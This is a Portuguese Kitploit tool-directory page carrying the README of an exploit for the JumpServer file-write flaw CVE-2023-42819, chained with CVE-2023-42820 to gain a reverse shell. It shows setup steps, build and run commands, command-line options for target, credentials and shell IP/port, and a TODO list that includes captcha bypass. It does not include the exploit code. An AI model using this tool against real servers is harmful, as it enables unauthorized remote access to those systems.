Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-42819 — CVE-2023-42819 | Kitploit
Ferramentas/GitHubGitHub/c1ph3rx13/cve-2023-42819
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de Penetração
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

Ver Repositório
63há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-42819

CVE-2023-42819

Descrição da Vulnerabilidade

Vulnerabilidade de escrita arbitrária de arquivos no JumpServer

CVE-2023-42819 + CVE-2023-42820 = GetShell

USO

  1. Coloque o script e os arquivos necessários no mesmo diretório

  2. Confirme que o Google Chrome está instalado e obtenha o número da versão do Google Chrome

root@kitploit:~
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. De acordo com o número da versão correspondente do Google Chrome e o sistema, baixe o chromedriver e coloque-o no webdriver

    Versão mais recente: https://googlechromelabs.github.io/chrome-for-testing/

    Versões históricas: https://chromedriver.chromium.org/downloads/version-selection

    Exigências demais : (

  2. Escute o IP e Porta correspondentes, aguardando o shell reverso

Versão Python

root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用,请勿用于其他用途

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 by C1ph3rX13.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url
  -u USERNAME, --username USERNAME
                        account username
  -p PASSWORD, --password PASSWORD
                        account password
  --ip IP               shell ip
  --port PORT           shell port
  --proxy PROXY         proxy to http://ip:port

image-1

image-1

Versão Go

Compilação

root@kitploit:~
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

Execução

root@kitploit:~
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: 代码仅供学习使用,请勿用于其他用途                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        Shell IP
  -p string
        Account Password
  -port string
        Shell Port
  -proxy string
        Proxy Url
  -t string
        Target Url
  -u string
        Account Username

image-1

TODO

  • A maneira de resolver CORS não é elegante
  • Reescrever usando httpx
  • Adicionar func EXP
  • Reescrever usando go-resty
  • Bypass do captcha devido a senha incorreta no login
  • Adicionar tipos de shell reverso
  • Usar modo headless compatível com Linux
  • Adicionar proxy http, https, socks
  • CVE-2023-42819 + CVE-2023-42820 GetShell com um clique
  • Tantas metas, talvez não sejam concluídas : (

Manutenção

  • 2023-10-18 Adicionar detecção automática de bypass de site - Versão Python
  • 2023-10-18 Reestruturar funções do cliente
  • 2023-10-18 Simplificar lógica de execução
  • 2023-10-18 Testado no Linux OK - Versão Go

Aviso de Isenção de Responsabilidade

  1. Esta ferramenta destina-se exclusivamente a profissionais de teste de penetração com autorização legítima e a operadores de redes que realizam manutenção de rotina. Os usuários podem baixar, copiar, distribuir ou usar este software somente após obter autorização legal suficiente e para fins não comerciais.
  2. Ao usar esta ferramenta, você deve garantir que todas as suas ações estejam em conformidade com as leis e regulamentos locais, e não deve usar este software para atividades que violem as leis da República Popular da China. Todos os autores e colaboradores desta ferramenta não se responsabilizam por qualquer responsabilidade decorrente do uso não autorizado desta ferramenta para atividades ilegais.
Baixar ferramenta